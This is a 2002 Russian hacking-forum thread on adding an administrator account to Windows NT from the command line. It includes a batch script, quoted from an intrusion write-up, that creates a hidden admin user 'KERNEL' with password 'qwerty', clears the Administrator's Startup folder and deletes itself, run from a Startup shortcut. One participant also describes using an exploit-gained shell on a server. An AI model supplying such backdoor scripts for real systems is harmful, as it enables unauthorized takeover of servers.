Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
|
NT (cmd.exe) adduser[admin] 16.05.02 20:23 Число просмотров: 1481
Автор: cool Статус: Незарегистрированный пользователь
|
> Кто знает как консольно добавить USER'a c определенными
> правами в WinNT??
> thnx.
net help user |more
Читаешь до просветления, и потом
net help localgroup
|
|
<hacking>
|
NT (cmd.exe) adduser[admin] 16.05.02 19:47
Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member
|
Кто знает как консольно добавить USER'a c определенными правами в WinNT??
thnx.
|
|
net user ? 17.05.02 20:09
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
|
|
|
|
autoadd 16.05.02 21:12
Автор: DelGod Статус: Незарегистрированный пользователь
|
далее будет вырезка из статьи
Изучение корпоративной сети компании
"XXXXX" Engineering Co. of North Carolina Inc".
которая опубликована на hackzone.ru
я думаю ты разбершся что к чему
Пишем следующий скрипт:
net user KERNEL qwerty /ADD /passwordreq:no
net localgroup Administrators KERNEL /ADD
del "c:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup\*" /Q >nul
del c:\kernel.cmd
Записываю его в корень диска "C" под именем kernel.cmd.
Затем в каталог:
C:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup закидываю ярлык, указывающий на файл c:\kernel.cmd. Теперь когда администратор зайдет на сервер, скрипт сработает и добавит пользователя KERNEL с правами Администратора и с паролем "qwerty". В конце концов скрипт удаляется.
|
| |
autoadd 17.05.02 02:51
Автор: cool Статус: Незарегистрированный пользователь
|
> Записываю его в корень диска "C" под именем kernel.cmd.
> Затем в каталог:
> C:\WINNT\Profiles\Administrator\Start Menu\Programs\Startup
> закидываю ярлык, указывающий на файл c:\kernel.cmd. Теперь
> когда администратор зайдет на сервер, скрипт сработает и
> добавит пользователя KERNEL с правами Администратора и с
> паролем "qwerty". В конце концов скрипт удаляется.
Чё то я не понял если ты имеешь доступ к профилю админа, следовательно ты админ, либо у тебя есть права систем, но тогда зачем такой геморой? можно просто запустить скрипт и перелогиниться под новым юзером.
|
| | |
autoadd 23.05.02 17:39
Автор: DelGod Статус: Незарегистрированный пользователь
|
> Чё то я не понял если ты имеешь доступ к профилю админа,
> следовательно ты админ
не обезательно читал про новую дырку в вин2к???
> либо у тебя есть права систем, но
> тогда зачем такой геморой? можно просто запустить скрипт и
> перелогиниться под новым юзером.
я цитировал!!!
я ничего не утверждаю
|
|
NT (cmd.exe) adduser[admin] 16.05.02 20:23
Автор: cool Статус: Незарегистрированный пользователь
|
> Кто знает как консольно добавить USER'a c определенными
> правами в WinNT??
> thnx.
net help user |more
Читаешь до просветления, и потом
net help localgroup
|
| |
(cmd.exe) reboot? 17.05.02 18:31
Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member
|
спасибо огромное.
еще один ээээ...."бонус"
как НЕ дожидаясь перезагрузить сервак.
Залить фаил я не могу(причин обьяснять не буду).
через цмд.ехе это возможо? может какой-нить ДОС?
thnx
|
| | |
(cmd.exe) reboot? 21.05.02 20:09
Автор: ud Статус: Незарегистрированный пользователь
|
> спасибо огромное.
> еще один ээээ...."бонус"
> как НЕ дожидаясь перезагрузить сервак.
> Залить фаил я не могу(причин обьяснять не буду).
> через цмд.ехе это возможо? может какой-нить ДОС?
> thnx
хихи, а что за секреты ?? я думал юникод уже оставили в покое -)))
|
| | | |
2ud 21.05.02 20:46
Автор: Zlobnui_Mydak[HitU] <Pr3DV+0Я> Статус: Member
|
|
Я не юикод юзаю а комманд шелл с эксплоита.
|
| | |
как сделать НЕ консольным методом 17.05.02 20:11
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
|
|
в тулзе hyena есть удаленный ребут/шатдаун хостов (естесственно необзодимо иметь права админа)
|
| | | |
кстати, я такую тулзу сам писал. могу выложить вместе с исходниками, если кому надо 20.05.02 04:25
Автор: йцукенг <jcukeng> Статус: Member
Отредактировано 20.05.02 04:29 Количество правок: 1
|
> в тулзе hyena есть удаленный ребут/шатдаун хостов
> (естесственно необзодимо иметь права админа)
кстати, я такую тулзу(для remote reboot) сам писал.
могу выложить вместе с исходниками, если кому надо.
|
| | | | |
Если не тяжело.... :) Дай линк так сказать :) 20.05.02 09:34
Автор: DamNet <Denis Amelin> Статус: Elderman
|
|
|
| | | | | |
еще один линк на кульные консольные тулзи 20.05.02 13:50
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
|
aka pstools
http://sysinternals.com/ntw2k/freeware/pstools.shtml
от Марка Русиновича - управление удаленными процессами из командной строки и т.д. (в том числе ребут с шатдауном)
PsExec - execute processes remotely
PsFile - shows files opened remotely
PsGetSid - display the SID of a computer or a user
PsKill - kill processes by name or process ID
PsInfo - list information about a system
PsList - list detailed information about processes
PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
PsLogList - dump event log records
PsService - view and control services
PsShutdown - shuts down and optionally reboots a computer
PsSuspend - suspends processes
PsUptime - shows you how long a system
|
|
|
подробно о проекте
Анализ криптографических сетевых...
